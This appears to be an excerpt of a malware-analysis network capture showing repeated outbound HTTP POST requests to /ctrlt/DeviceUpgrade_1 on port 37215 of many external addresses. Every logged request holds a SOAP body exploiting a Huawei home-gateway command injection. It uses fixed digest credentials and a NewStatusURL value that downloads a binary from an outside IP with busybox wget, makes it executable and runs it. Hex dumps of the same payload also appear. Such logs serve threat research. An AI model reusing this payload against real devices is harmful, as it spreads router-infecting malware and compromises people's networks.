                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              229192.168.2.153306441.153.24.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205365896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              230192.168.2.1538484190.175.129.1937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205365896 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              231192.168.2.1548024122.33.7.1337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205434084 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              232192.168.2.1538460142.157.33.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205439091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              233192.168.2.1553654156.39.248.20837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205451012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              234192.168.2.153319841.106.137.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205478907 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              235192.168.2.1552584181.106.230.1637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205480099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              236192.168.2.154696231.149.200.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205480099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              237192.168.2.1536412222.231.170.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205518961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              238192.168.2.155810231.184.51.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205519915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              239192.168.2.1548730222.217.206.22537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205519915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
